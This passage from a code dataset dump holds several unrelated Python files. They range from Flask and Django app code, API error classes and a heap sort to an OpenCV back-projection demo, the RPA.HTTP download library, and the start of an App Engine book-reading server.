        # Allow overriding the default message per instance
        self._message = kwargs.get('message', self._message)
    def get_description(self):
        """Return the human-readable error description."""
        return self._message
    def get_dict(self):
        """Log the error and return the serializable error payload."""
        info = self.get_log_information()
        self.log(info)
        return {
            'Error': {
                'ErrorCode': self.code,
                'ErrorDescription': self.get_description(),
            }
        }
    def get_log_information(self):
        # self.code is supplied by the concrete subclass
        return '[%s] %d %s' % (self.__class__.__name__,
                               self.code,
                               self.get_description())
    def log(self, message):
        # Default logging at INFO level; subclasses may silence or escalate
        logger.info(message)
class EmptyError(ApiError):
    """Sentinel error with no status and no message; never logged."""
    code = 0
    _message = ''
    def log(self, message):
        # Intentionally silent
        pass
class NoContent(ApiError):
    """HTTP 204 No Content."""
    code = 204
class BadRequest(ApiError):
    """HTTP 400 Bad Request."""
    code = 400
class WrongParameter(BadRequest):
    """HTTP 400 with the offending parameter name in the message."""
    _message = 'Invalid parameter %s.'
    def __init__(self, **kwargs):
        super(WrongParameter, self).__init__(**kwargs)
        # Required: name of the invalid/missing parameter
        self.parameter = kwargs['parameter']
    def get_description(self):
        return self._message % self.parameter
class ParameterExpected(WrongParameter):
    """HTTP 400: a required parameter was absent."""
    _message = 'Parameter %s expected.'
class UnauthorizedError(ApiError):
    """HTTP 401 Unauthorized."""
    code = 401
    _message = 'Authentication error.'
class NotEnoughMoney(ApiError):
    """HTTP 402 Payment Required."""
    code = 402
    _message = 'Not enough money.'
class Forbidden(ApiError):
    """HTTP 403 Forbidden."""
    code = 403
class NotFound(ApiError):
    """HTTP 404 Not Found."""
    code = 404
class Conflict(ApiError):
    """HTTP 409 Conflict."""
    code = 409
class InternalServerError(ApiError):
    """HTTP 500; keeps the caught exception and logs with a traceback."""
    code = 500
    # _message = 'Internal server error: %s (%s)'
    _message = 'Internal server error'
    def __init__(self, **kwargs):
        super(InternalServerError, self).__init__(**kwargs)
        # Original exception, kept for inspection (not exposed to clients)
        self.caught_error = kwargs.get('error')
    # def get_description(self):
    #     return self._message % (self.caught_error, type(self.caught_error))
    def log(self, message):
        # logger.exception records the active traceback as well
        logger.exception(message)
class ServiceUnavailable(InternalServerError):
    """HTTP 503 Service Unavailable (third-party dependency down)."""
    code = 503
    _message = 'Third-party service is unavailable'
|
997,728 | f9e1ab8945f0dfb175c14633cc03aaea24df239c | from unittest import TestCase
from recommender import Recommender
# TODO: write proper testcases
class AllInOne(TestCase):
    """End-to-end smoke test feeding every recorded visit into Recommender."""

    def test_recommend(self):
        # BUGFIX: the method was named "recommend", so unittest discovery
        # never executed it; test methods must start with "test".
        recom = Recommender(documents_n = 20, persons_n = 20)
        for vizit in Data():
            recom.record(vizit[0], vizit[1])
        self.assertEqual(recom.recommend('430586149'), ['433940066', '431329924', '433862262'])
class Data(object):
def __iter__(self):
raw = self.raw().split('\n')
for line in raw:
yield line.split(',')
def raw(self):
return """430592357,ZvCTasj4
430586149,ZvCTasj4
201397816,ZyrCGvQQ
214597966,ZSV4Hkiw
430584391,zy0RUZnG
431065083,ZvCTasj4
201361464,ZyrCGvQQ
302482929,ZSV4Hkiw
330117582,ZvCTasj4
433862262,ZSOmPzCw
426482194,ZSOmPzCw
425224044,ZSOmPzCw
201369542,ZzVi46JN
363734570,ZZS1KlwN
431246574,ZxqvpImX
431249575,ZxqvpImX
201359004,ZzVi46JN
430466714,zy0RUZnG
319731179,ZxqvpImX
431246574,zXRRGKfX
430716481,zXRRGKfX
201362184,Zsl8FsLx
430466714,zXRRGKfX
324918927,ZSV4Hkiw
201361657,ZzVi46JN
424384375,ZSOmPzCw
431293112,ZSV4Hkiw
430519225,ZzVi46JN
330117582,ZYw24l7D
382903817,ZvAD7jk3
201423486,ZvAD7jk3
433862262,zwBr9yLl
430347776,zXRRGKfX
250683776,zXHGOep9
390255494,zXHGOep9
336148236,zXHGOep9
419502781,ZvAD7jk3
433178444,zwBr9yLl
412161719,ZvAD7jk3
429615716,zy0RUZnG
431246574,ZYw24l7D
201377744,ZYw24l7D
433650250,zwBr9yLl
431293112,zXHGOep9
425225457,zy0RUZnG
391386058,ZTJaUd81
422313668,ZTJaUd81
201369659,ZY1KyJuH
431293112,ZTJaUd81
201379948,ZY1KyJuH
430716481,ZTJaUd81
201366382,zWNxGYWo
201357695,ZY1KyJuH
433862262,Zsl8FsLx
430651758,ZWSlLHdc
431304967,Zsl8FsLx
201360390,ZY1KyJuH
430716481,Zsl8FsLx
430658308,ZWSlLHdc
330117582,ZWSlLHdc
431065083,ZWSlLHdc
431246574,ZxqvpImX
433178444,Zt3n32p0
250683776,Zt3n32p0
319731179,zWNxGYWo
330117582,Zt3n32p0
430347776,Zt3n32p0
201362419,zWNxGYWo
412161719,Zv8Uozhb
433862262,ZSnRUCB6
433178444,ZSnRUCB6
431329924,ZSnRUCB6
431293112,ZSnRUCB6
201366382,zWNxGYWo
201397816,ZyrCGvQQ
201366633,ZyrCGvQQ
422313668,Zv8Uozhb
363734570,Zv8Uozhb
371894284,Zv8Uozhb
429110215,zUl2imWb
430609436,ZZS1KlwN
433862262,zxKKxPIY
431304967,ZYnhGo6X
201361023,zUl2imWb
201382402,ZYw24l7D
433862262,ZYnhGo6X
429615716,ZZS1KlwN
201379347,zxKKxPIY
422313668,ZZS1KlwN
201359861,zxKKxPIY
201361844,zxKKxPIY
201721820,zUl2imWb
431244481,ZYnhGo6X
431293112,zUl2imWb
201358641,zwBr9yLl
201362419,ZYnhGo6X
433940066,zyYIkGkk
433862262,zyYIkGkk
431329924,zyYIkGkk
430586149,zyYIkGkk"""
|
997,729 | 815654909ee73aa3e4ffb8487d1aebf82b21ba9c | # Generated by Django 2.0.3 on 2018-04-20 20:18
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the Comment model, widens Post.body, and links Comment -> Post.
    dependencies = [
        ('forum', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('com_title', models.CharField(max_length=140)),
                ('com_body', models.CharField(max_length=500)),
            ],
        ),
        migrations.AlterField(
            model_name='post',
            name='body',
            field=models.CharField(max_length=500),
        ),
        migrations.AddField(
            model_name='comment',
            name='post',
            # NOTE(review): on_delete=None will raise when a related Post is
            # deleted — likely meant models.CASCADE. Kept unchanged because
            # applied migrations are historical records; confirm before editing.
            field=models.ForeignKey(on_delete=None, related_name='comments', to='forum.Post'),
        ),
    ]
|
997,730 | 53c64ab2738c849239e19b267ffb7589d14947e1 | from collections import defaultdict
# Parse the raw results file: one accuracy line per (embedding, domain) pair,
# in the same nested order as the loops below.
with open('perf.txt', 'r') as f:
    perfs = f.readlines()
# The 20 Amazon review domains, in the order they appear in perf.txt
domains = ['Video_Games', 'Books', 'Toys_Games', 'Tools_Home_Improvement', 'Amazon_Instant_Video', 'Movies_TV', 'Electronics', 'Health',
           'Shoes', 'Baby', 'Automotive', 'Software', 'Sports_Outdoors', 'Clothing_Accessories', 'Beauty', 'Patio', 'Music',
           'Pet_Supplies', 'Office_Products', 'Home_Kitchen']
#word_embeddings = ['embeddings_snap_s256_e15.txt', 'embeddings_snap_s256_e50.txt', 'embeddings_snap_s256_e30.txt',
#                   'embeddings_snap_s512_e15.txt', 'embeddings_snap_s128_e15.txt', 'embeddings_snap_s128_e30.txt',
#                   'embeddings_snap_s128_e50.txt', 'embeddings_snap_s512_e50.txt', 'embeddings_snap_s512_e30.txt']
word_embeddings = ['embeddings_snap_s512_e15.txt', 'embeddings_snap_s128_e15.txt', 'embeddings_snap_s128_e30.txt',
                   'embeddings_snap_s128_e50.txt', 'embeddings_snap_s512_e50.txt', 'embeddings_snap_s512_e30.txt']
it = 0
perf_dict = defaultdict(list)
# Each input line looks like "<label>: <value>"; keep the value's first 5 chars
for i, emb in enumerate(word_embeddings):
    for j, domain in enumerate(domains):
        perf = perfs[it].replace('\n', '').strip().split(':')[-1][0:5]
        it = it + 1
        perf_dict[domain].append(perf)
# Emit one '&'-separated (LaTeX table style) row per domain
for dom in domains:
    print (dom + ':' +'&'.join(perf_dict[dom]))
|
997,731 | 9634f8c206d56a1597fc1f251e09fcb38f4f8ad0 | from flask import render_template, flash, redirect, session, url_for, request, g
from flask.ext.login import login_user, logout_user, current_user, login_required
from app import app, db, lm
from forms import LoginForm
from models import User, Post, FlickrAccount, Account, PhotoAlbum
import glob
import json
import traceback
import flickr_api
@lm.user_loader
def load_user(id):
    """Flask-Login callback: load a User by primary-key id."""
    return User.query.get(int(id))
@app.before_request
def before_request():
    # Expose the current user on flask.g for views and templates
    g.user = current_user
@app.route('/')
@app.route('/index')
def index():
user = g.user
posts = Post.query.order_by(Post.timestamp.desc())
photo_urls = []
try:
albums = PhotoAlbum.query.order_by(PhotoAlbum.id)
except Exception as e:
traceback.print_exc()
print str(e)
return render_template('home.html', albums=albums, posts=posts, photo_urls=json.dumps(photo_urls))
@app.route('/login', methods = ['GET', 'POST'])
def login():
    """Show the login form; on valid submission log the user in and go to /admin."""
    # Already authenticated users are sent straight to the home page
    if g.user is not None and g.user.is_authenticated():
        return redirect(url_for('index'))
    form = LoginForm()
    if form.validate_on_submit():
        print "Form submitted and everyting was good?"
        if form.get_user():
            login_user(form.get_user())
            return redirect(url_for('admin'))
    return render_template('login.html',
        title = 'Sign In',
        form = form)
@app.route('/logout')
def logout():
    """Log the current user out and return to the home page."""
    logout_user()
    return redirect(url_for('index'))
@app.route('/code')
def code():
    """Static 'code' page."""
    return render_template('code.html')
@app.route('/about')
def about():
    """Static 'about' page."""
    return render_template('about.html')
@app.route('/running')
def running():
    """Static 'running' page."""
    return render_template('running.html')
@app.route('/photography/album/<id>')
def photo_album(id):
try:
album = PhotoAlbum.query.get(id)
except Exception as e:
traceback.print_exc()
print str(e)
return render_template('album.html', album=album)
|
997,732 | abe95463e187e0de0287c0c3c80d8dac7eda21cf | from math import floor
def troca(a, i, j):
    """Swap the elements of *a* at positions *i* and *j* in place."""
    tmp = a[i]
    a[i] = a[j]
    a[j] = tmp


def arruma_heap(a, inicio, fim):
    """Sift a[inicio] down until a[inicio..fim] satisfies the max-heap property."""
    raiz = inicio
    filho = 2 * raiz + 1
    while filho <= fim:
        maior = raiz
        if a[maior] < a[filho]:
            maior = filho
        if filho + 1 <= fim and a[maior] < a[filho + 1]:
            maior = filho + 1
        if maior == raiz:
            return
        troca(a, raiz, maior)
        raiz = maior
        filho = 2 * raiz + 1


def cria_heap(a, tamanho):
    """Turn the first *tamanho* elements of *a* into a max-heap, bottom-up."""
    for inicio in range(floor((tamanho - 2) / 2), -1, -1):
        arruma_heap(a, inicio, tamanho - 1)


def heap_sort(a, tamanho):
    """Sort the first *tamanho* elements of *a* in ascending order, in place."""
    cria_heap(a, tamanho)
    for fim in range(tamanho - 1, 0, -1):
        troca(a, 0, fim)
        arruma_heap(a, 0, fim - 1)
# Quick demonstration: sort a sample list in place and show the result
lista = [5, 8, 2, 45, 6, 5, 3]
heap_sort(lista, 7)
print(lista)
997,733 | 54deca45c972bfad5b5b83e4893b6e66610f73c9 | # pylint: disable=C0411,C0412,C0413
import logging
from pathlib import Path
import re
from typing import Any, Optional, Union, List
from urllib.parse import urlparse
import RequestsLibrary.log
from RequestsLibrary.utils import is_file_descriptor
from robot.api import logger
from RPA.core.notebook import notebook_file
from RPA.FileSystem import FileSystem
LOG_CHAR_LIMIT = 10000
def log_response(response):
    """Log method, URL, status, headers and (truncated) body of a response
    at DEBUG level, replacing RequestsLibrary's noisier INFO logging.
    """
    logger.debug(
        "%s Response : url=%s \n " % (response.request.method.upper(), response.url)
        + "status=%s, reason=%s \n " % (response.status_code, response.reason)
        + "headers=%s \n " % response.headers
        + "body=%s \n " % format_data_to_log_string(response.text)
    )
def log_request(response):
    """Log the originating request of *response* at DEBUG level.
    When the response followed redirects, the first request of the chain
    is logged and marked "(redirected)".
    """
    request = response.request
    if response.history:
        original_request = response.history[0].request
        redirected = "(redirected) "
    else:
        original_request = request
        redirected = ""
    logger.debug(
        "%s Request : " % original_request.method.upper()
        + "url=%s %s\n " % (original_request.url, redirected)
        + "path_url=%s \n " % original_request.path_url
        + "headers=%s \n " % original_request.headers
        + "body=%s \n " % format_data_to_log_string(original_request.body)
    )
def format_data_to_log_string(data, limit=LOG_CHAR_LIMIT):
    """Return *data* prepared for logging.

    Falsy payloads map to ``None`` and file descriptors to their repr.
    Long payloads are truncated to *limit* characters unless the root
    logger level is DEBUG/TRACE (numeric level 10 or lower).
    """
    if not data:
        return None
    if is_file_descriptor(data):
        return repr(data)
    too_long = len(data) > limit
    verbose = logging.getLogger().level <= 10
    if too_long and not verbose:
        return (
            "%s... (set the log level to DEBUG or TRACE to see the full content)"
            % data[:limit]
        )
    return data
RequestsLibrary.log.log_response = log_response
RequestsLibrary.log.log_request = log_request
from RequestsLibrary import RequestsLibrary # noqa: E402
# NOTE. Above logging changes are related to. Especially on Automation Studio
# extensive INFO level logging makes readability problematic.
# https://github.com/MarketSquare/robotframework-requests/issues/353
class HTTP(RequestsLibrary):
    """The *RPA.HTTP* library extends functionality of the `RequestsLibrary`_.
    See that documentation for several examples of how to issue ``GET``
    requests and utilize the returned ``result`` objects.
    .. _RequestsLibrary: https://marketsquare.github.io/robotframework-requests/doc/RequestsLibrary.html
    This extension provides helper keywords to get an HTTP resource on a
    session. The ``HTTP Get`` and ``Download`` keywords will initiate a
    session if one does not exist for the provided URL, or use an existing
    session. When using these keywords, you do not need to manage
    sessions with ``Create Session``. Session management is still
    required if you use the underlying session keywords, e.g.,
    ``* On Session``.
    """  # noqa: E501

    ROBOT_LIBRARY_SCOPE = "GLOBAL"
    ROBOT_LIBRARY_DOC_FORMAT = "reST"

    def __init__(self, *args, **kwargs) -> None:
        RequestsLibrary.__init__(self, *args, **kwargs)
        self.logger = logging.getLogger(__name__)
        self.fs = FileSystem()
        # Prefix used to build per-host session aliases
        self.session_alias_prefix = "rpasession_alias."
        self.current_session_alias = None

    def http_get(
        self,
        url: str,
        target_file: Optional[str] = None,
        verify: Union[bool, str] = True,
        force_new_session: bool = False,
        overwrite: bool = False,
        stream: bool = False,
        **kwargs,
    ) -> dict:
        """
        A helper method for ``Get Request`` that will create a session, perform GET
        request, and store the target file, if set by the ``target_file`` parameter.
        The old session will be used if the URL scheme and the host are the same as
        previously, e.g., 'https://www.google.fi' part of the URL.
        .. code-block:: robotframework
            *** Settings ***
            Library    RPA.HTTP
            *** Variables ***
            ${DOWNLOAD_PATH}=   ${OUTPUT DIR}${/}downloads
            ${WORD_EXAMPLE}=    https://file-examples.com/wp-content/uploads/2017/02/file-sample_100kB.doc
            ${EXCEL_EXAMPLE}=   https://file-examples.com/wp-content/uploads/2017/02/file_example_XLS_10.xls
            *** Tasks ***
            Download files with reused session
                # Starts a new session
                HTTP Get   ${WORD_EXAMPLE}    target_file=${DOWNLOAD_PATH}${/}word-example.doc
                # Uses the previous session
                HTTP Get   ${EXCEL_EXAMPLE}   target_file=${DOWNLOAD_PATH}${/}excel-example.xls
        :param url: target URL for GET request
        :param target_file: filepath to save request content, default ``None``
        :param verify: if SSL verification should be done, default ``True``,
            a CA_BUNDLE path can also be provided
        :param force_new_session: if new HTTP session should be created,
            default ``False``
        :param overwrite: used together with ``target_file``, if ``True`` will overwrite
            the target file, default ``False``
        :param stream: if ``False``, the response content will be immediately downloaded
        :return: request response as a dict
        """  # noqa: E501
        uc = urlparse(url)
        http_host = f"{uc.scheme}://{uc.netloc}"
        request_alias = f"{self.session_alias_prefix}{uc.scheme}{uc.netloc}"
        url_path = url.replace(http_host, "")
        if force_new_session or not self.session_exists(request_alias):
            self.logger.info("Creating a new HTTP session")
            self.create_session(request_alias, http_host, verify=verify)
        else:
            self.logger.info("Using already existing HTTP session")
        self.current_session_alias = request_alias
        response = self.get_on_session(request_alias, url_path, stream=stream, **kwargs)
        if target_file is not None:
            # BUGFIX: pass the Response object itself, not response.content;
            # _create_or_overwrite_target_file iterates response.iter_content,
            # which bytes do not provide (this also matches `download`).
            self._create_or_overwrite_target_file(target_file, response, overwrite)
        return response

    def _create_or_overwrite_target_file(
        self,
        path: str,
        response: Any,
        overwrite: bool,
    ) -> None:
        # Stream the response body to disk in chunks; create parent dirs,
        # and only write when the file is new or overwrite is requested.
        CHUNK_SIZE = 32768
        Path(path).parent.mkdir(parents=True, exist_ok=True)
        file_exists = Path(path).is_file()
        if not file_exists or (file_exists and overwrite):
            with open(path, "wb") as f:
                for chunk in response.iter_content(CHUNK_SIZE):
                    if chunk:  # filter out keep-alive new chunks
                        f.write(chunk)
        notebook_file(path)

    def get_current_session_alias(self) -> str:
        """Get request session alias that was used with the ``HTTP Get`` keyword.
        :return: name of session alias as a string
        """
        return self.current_session_alias

    def download(
        self,
        url: str,
        target_file: Optional[str] = None,
        verify: Union[bool, str] = True,
        force_new_session: bool = False,
        overwrite: bool = False,
        stream: bool = False,
        **kwargs,
    ) -> dict:
        """An alias for the ``HTTP Get`` keyword.
        The difference in use is that the URL is always downloaded based on
        the URL path (even without ``target_file``). If there is a filename
        in the path, then that is used as ``target_file`` to save to. By default,
        the filename will be "downloaded.html".
        .. code-block:: robotframework
            *** Settings ***
            Library    RPA.HTTP
            *** Variables ***
            ${DOWNLOAD_PATH}=   ${OUTPUT DIR}${/}downloads
            ${WORD_EXAMPLE}=    https://file-examples.com/wp-content/uploads/2017/02/file-sample_100kB.doc
            ${EXCEL_EXAMPLE}=   https://file-examples.com/wp-content/uploads/2017/02/file_example_XLS_10.xls
            *** Tasks ***
            Download files with reused session with provided file names
                # Starts a new session
                Download   ${WORD_EXAMPLE}    target_file=${DOWNLOAD_PATH}
                # Uses the previous session
                Download   ${EXCEL_EXAMPLE}   target_file=${DOWNLOAD_PATH}
                # Above files are downloaded using the same names as they have
                # on the remote server.
        :param url: target URL for GET request
        :param target_file: filepath to save request content, default ``None``
        :param verify: if SSL verification should be done, default ``True``,
            a CA_BUNDLE path can also be provided
        :param force_new_session: if new HTTP session should be created,
            default ``False``
        :param overwrite: used together with ``target_file``, if ``True`` will overwrite
            the target file, default ``False``
        :param stream: if ``False`` the response content will be immediately downloaded
        :return: request response as a dict
        """  # noqa: E501
        response = self.http_get(
            url,
            verify=verify,
            force_new_session=force_new_session,
            overwrite=overwrite,
            stream=stream,
            **kwargs,
        )
        dirname = Path()
        filename = None
        if target_file is not None:
            target = Path(target_file)
            if target.is_dir():
                dirname = target
            else:
                dirname = target.parent
                filename = target.name
        if filename is None:
            # Fall back to the last URL path segment, or a generic name
            filename = urlparse(url).path.rsplit("/", 1)[-1] or "downloaded.html"
        self._create_or_overwrite_target_file(dirname / filename, response, overwrite)
        return response

    def check_vulnerabilities(self) -> List:
        """Check for possible vulnerabilities in the installed runtime
        environment packages.
        Currently will check only for OpenSSL version and outputs warning message on any
        discovered vulnerability.
        :return: list of all check results
        .. code-block:: robotframework
            *** Tasks ***
            Vulnerability Check
                ${results}=    Check Vulnerabilities
                FOR    ${result}    IN    @{results}
                    Log To Console    TYPE: ${result}[type]
                    Log To Console    VULNERABLE: ${result}[vulnerable]
                    Log To Console    MESSAGE: ${result}[message]
                END
        """
        all_results = []
        vulnerable, message = self._check_openssl_vulnerabilities()
        all_results.append(
            {"type": "OpenSSL", "vulnerable": vulnerable, "message": message}
        )
        if vulnerable:
            self.logger.warning(message)
        return all_results

    def _check_openssl_vulnerabilities(self):
        # OpenSSL 3.0.0 - 3.0.6 are affected by CVE-2022-3602/3786
        message = "No OpenSSL detected"
        try:
            import ssl  # pylint: disable=C0415

            open_ssl_version = re.match(
                r"OpenSSL (\d+)\.(\d+)\.(\d+).*", ssl.OPENSSL_VERSION
            )
            if open_ssl_version and len(open_ssl_version.groups()) == 3:
                major, minor, fix = [int(val) for val in open_ssl_version.groups()]
                if major == 3 and minor == 0 and (0 <= fix <= 6):
                    return True, (
                        rf"Dependency with HIGH severity vulnerability detected: '{ssl.OPENSSL_VERSION}'. "  # noqa: E501
                        "For more information see https://robocorp.com/docs/faq/openssl-cve-2022-11-01"  # noqa: E501
                    )
                message = ssl.OPENSSL_VERSION
        except ImportError:
            pass
        return False, message
|
997,734 | bad4bc972d735eb9f96cea8fcb6eb4b004cd4a54 | import cv2 # import OpenCV module.
from matplotlib import pyplot as plt # import matplotlib
# Step 1: load the image and interactively pick a region of interest (ROI).
img = cv2.imread('Figures/PizzaOnConveyor.jpg')
img_ref = img.copy()
# "selectROI" opens a window to select a single RegionOfInterest bounding box.
# NOTE(review): cv2.selectROI returns (x, y, w, h), so 'roiTop' actually holds
# x and 'roiLeft' holds y. The slicing/rectangle below are consistent with
# that, but the variable names are misleading -- confirm before refactoring.
roiTop, roiLeft, roiWidth, roiHeight = cv2.selectROI(img)
print(roiTop, roiLeft, roiWidth, roiHeight)
roi = img[roiLeft:roiLeft+roiHeight, roiTop:roiTop+roiWidth]
# Draw the chosen box (red, 2 px) on the reference copy for later display.
cv2.rectangle(img_ref, (roiTop,roiLeft), (roiTop+roiWidth,roiLeft+roiHeight), (0,0,255), 2)
# Step 2: compute HSV histograms for the whole image and for the ROI.
img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# 1D histograms for the full image (Hue, Saturation, Value channels).
# NOTE(review): OpenCV histogram ranges are half-open, so [0,255] excludes the
# value 255; [0,256] is the conventional upper bound -- confirm intent.
histH_img = cv2.calcHist([img_hsv], [0], None, [180], [0,180])
histS_img = cv2.calcHist([img_hsv], [1], None, [256], [0,255])
histV_img = cv2.calcHist([img_hsv], [2], None, [256], [0,255])
# 2D histogram over the (Hue, Value) channel pair for the full image,
# normalized into [0, 255] for display/back-projection.
hist2D_img = cv2.calcHist([img_hsv], [0,2], None, [180,256], [0,180,0,255])
cv2.normalize(hist2D_img, hist2D_img, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX);
roi_hsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
# Same 1D histograms, restricted to the selected ROI.
histH_roi = cv2.calcHist([roi_hsv], [0], None, [180], [0,180])
histS_roi = cv2.calcHist([roi_hsv], [1], None, [256], [0,255])
histV_roi = cv2.calcHist([roi_hsv], [2], None, [256], [0,255])
# 2D (Hue, Value) histogram of the ROI -- this is the back-projection model.
hist2D_roi = cv2.calcHist([roi_hsv], [0,2], None, [180,256], [0,180,0,255])
cv2.normalize(hist2D_roi, hist2D_roi, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX);
# Visualize the 1D histograms (2x4 grid) to choose two channels for the model.
plt.subplot(241)
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
plt.title("Original")
plt.subplot(242)
plt.plot(histH_img)
plt.title("img: Hue Histogram")
plt.subplot(243)
plt.plot(histS_img)
plt.title("img: Sat Histogram")
plt.subplot(244)
plt.plot(histV_img)
plt.title("img: Val Histogram")
plt.subplot(245)
plt.imshow(cv2.cvtColor(roi, cv2.COLOR_BGR2RGB))
plt.title("ROI")
plt.subplot(246)
plt.plot(histH_roi)
plt.title("ROI: Hue Histogram")
plt.subplot(247)
plt.plot(histS_roi)
plt.title("ROI: Sat Histogram")
plt.subplot(248)
plt.plot(histV_roi)
plt.title("ROI: Val Histogram")
plt.show()
# Visualize the 2D histograms built from the chosen channels (Hue & Value).
plt.subplot(221)
plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
plt.title("Original")
plt.subplot(222)
plt.imshow(cv2.cvtColor(hist2D_img, cv2.COLOR_BGR2RGB))
plt.title("Original Image: 2D Histogram")
plt.xlabel('Value')
plt.ylabel('Hue')
plt.subplot(223)
plt.imshow(cv2.cvtColor(roi, cv2.COLOR_BGR2RGB))
plt.title("ROI")
plt.subplot(224)
plt.imshow(cv2.cvtColor(hist2D_roi, cv2.COLOR_BGR2RGB))
plt.title("ROI: 2D Histogram")
plt.xlabel('Value')
plt.ylabel('Hue')
plt.show()
# Step 3: back-project the ROI's (Hue, Value) histogram onto the full image --
# bright pixels are those whose colors are common inside the selected ROI.
backproj = cv2.calcBackProject([img_hsv], [0,2], hist2D_roi, [0,180,0,255], scale=2)
# Show the annotated original next to the back-projection result.
plt.subplot(121)
plt.imshow(cv2.cvtColor(img_ref, cv2.COLOR_BGR2RGB))
plt.title("Original Image w/ ROI")
plt.subplot(122)
plt.imshow(cv2.cvtColor(backproj, cv2.COLOR_BGR2RGB))
plt.title("Back Projection")
plt.show()
|
997,735 | 7e55aca5ec79f7069f3a457ebc19b871f040bb20 | #Author: Connor P. Bain
#Code for CockyReaders server-side
#Last modified December 3, 2014
import logging
import webapp2
import jinja2
import os
import json
from google.appengine.api import users
from google.appengine.ext import db
from __builtin__ import int
# Jinja2 environment loading HTML templates from the sibling "templates" dir.
jinja_environment = jinja2.Environment(
    loader=jinja2.FileSystemLoader(os.path.dirname(__file__) + "/templates"))
# Base URL prepended to book links; switch to localhost for development.
#Host = "http://localhost:9080/"
Host = "http://www.cockyreaders-test.appspot.com/"
class MainPage(webapp2.RequestHandler):
    """Base handler: user/template setup helpers plus the admin landing page."""
    def setupUser(self):
        """Populate template_values with the current user and a login/logout URL."""
        self.template_values = {}
        self.currentUser = users.get_current_user()
        self.template_values['user'] = self.currentUser
        if self.currentUser:
            self.template_values['login'] = users.create_logout_url("/")
        else:
            self.template_values['login'] = users.create_login_url(self.request.uri)
    def setupJSON(self, objID):
        """Set self.json when JSON output was requested (?fmt=json or a .json path).

        Returns objID with any '.json' suffix stripped."""
        self.json = False
        if (self.request.get('fmt') == 'json'):
            self.json = True
        if ('json' in self.request.path.split('.')):
            objID = objID.split('.')[0]
            self.json = True
        return objID
    def render(self, loadTemplate):
        """Render the named Jinja2 template with the accumulated template_values."""
        template = jinja_environment.get_template(loadTemplate)
        self.response.out.write(template.render(self.template_values))
    def get(self):
        """Admin landing page; seeds demo books on an empty datastore."""
        self.setupUser();
        #Remove this code after dataStore Objects are created
        query = Book.all();
        #DEMO CODE: create three sample books if the catalogue is empty.
        if query.count() == 0:
            newBook = Book(title = "Sleeping Beauty", genre = "Fantasy", isbn = int(1113), cover = "img/book_1.jpg", link = Host+"library/1113/")
            newBook.put()
            newBook = Book(title = "Moby Dick", genre = "Fantasy", isbn = int(1114), cover = "img/book_2.jpg", link = Host+"library/1114/")
            newBook.put()
            newBook = Book(title = "Where The Wild Things Are", genre = "Fantasy", isbn = int(1115), cover= "img/book_3.jpg" , link = Host+"library/1115/")
            newBook.put()
        self.template_values['title'] = "Administrator View"
        self.render("main.html")
    def getStudent(self, studentID):
        """Fetch a Student by numeric datastore id; redirect home when missing."""
        key = db.Key.from_path('Student', long(studentID))
        theStudent = db.get(key)
        if theStudent == None:
            self.redirect('/')
            return None
        return theStudent
# Handler for the mobile-app side of login and registration.
class LoginHandler(MainPage):
    def get(self, stuff):
        """Authenticate a user/password pair; responds 'Failure' (HTTP 500) or the username as JSON."""
        loginUser = self.request.get('user')
        loginPassword = self.request.get('password')
        #demo user: seed one student so login works on an empty datastore
        query = Student.all()
        if query.count() == 0:
            newStudent = Student(firstName="temp", lastName="temp", user="theFirst", password="password", bookList=[1113,1114])
            newStudent.put()
        #this does now work properly unless the key_name of each entry is that of the UserName
        #currently the key_name is the student id
        #key = db.Key.from_path('Student', loginUser )
        #theStudent = db.get(key)
        # NOTE(review): password is compared in plain text in the query.
        q = db.GqlQuery("SELECT * FROM Student WHERE user = :1 AND password = :2", loginUser, loginPassword)
        logging.info(q.count())
        self.response.headers.add_header('Access-Control-Allow-Origin', '*')
        if q.count() == 0:
            self.response.out.write("Failure")
            self.error(500)
        else:
            logging.info("Login successful")
            currentUser = q.get()
            # NOTE(review): elsewhere headers are set via self.response.headers;
            # verify that response.out exposes 'headers' in this webapp2 version.
            self.response.out.headers['Content-Type'] = "text/json"
            self.response.out.write(json.dumps(currentUser.user))
    def post(self, stuff):
        """Register a new user; writes 'Failure' on duplicate username, else 'Success'."""
        newUserName = self.request.get('user')
        newUserPassword = self.request.get('password')
        newUserFirstName = self.request.get('firstName')
        newUserlastName = self.request.get('lastName')
        newUserTeacher = self.request.get('teacher')
        newUserGrade = self.request.get('grade')
        newUserPin = self.request.get('pinNumber')
        q = db.GqlQuery("SELECT * FROM Student " + "WHERE user = :1", newUserName)
        if q.count() >= 1:
            #username already taken -> report error
            self.response.out.write("Failure")
            logging.debug("invalid user being added")
        else:
            #if error here, remove the int cast and just let the userpin be a string
            newUser = Student(user = newUserName,
                              firstName = newUserFirstName,
                              lastName = newUserlastName,
                              password = newUserPassword,
                              teacher = newUserTeacher,
                              grade = int(newUserGrade),
                              bookList = [1113, 1114, 1115, 1116 , 1117, 1119, 1120, 1121, 1123])
            newUser.put()
            # Seed reading stats for the first two default books.
            newStat = Stat(parent = newUser, isbn = 1113, owner = newUserName, pagesRead = 0, bookmark = 1)
            newStat.put()
            newStat = Stat(parent = newUser, isbn = 1114, owner = newUserName, pagesRead = 0, bookmark = 1)
            newStat.put()
            # NOTE(review): see the response.out.headers note in get().
            self.response.out.headers['Content-Type'] = "text"
            self.response.headers.add_header('Access-Control-Allow-Origin', '*')
            self.response.out.write("Success")
#class for handling the sending of book info to app
class BookHandler(MainPage):
    """Serve the requesting student's book list as JSON."""
    def get(self, bookID):
        self.setupUser()
        self.setupJSON(bookID)
        loginUser = self.request.get('user')
        logging.debug("value of my var is %s", str(loginUser))
        #DEMO CODE: seed one student so the endpoint works on an empty datastore.
        # BUG FIX: the seed previously passed 'userName'/'books', which are not
        # Student properties -- the model (and LoginHandler's seed) use
        # 'user'/'bookList', so the demo student could never be queried.
        query = Student.all()
        if (query.count() == 0):
            newStudent = Student(firstName="temp", lastName="temp", user="theFirst", password="password", bookList=[1113,1114])
            newStudent.put()
        # Look up the requesting student; fall back to a default book list when
        # unknown.  BUG FIX: 'theStudent' was previously initialised to an empty
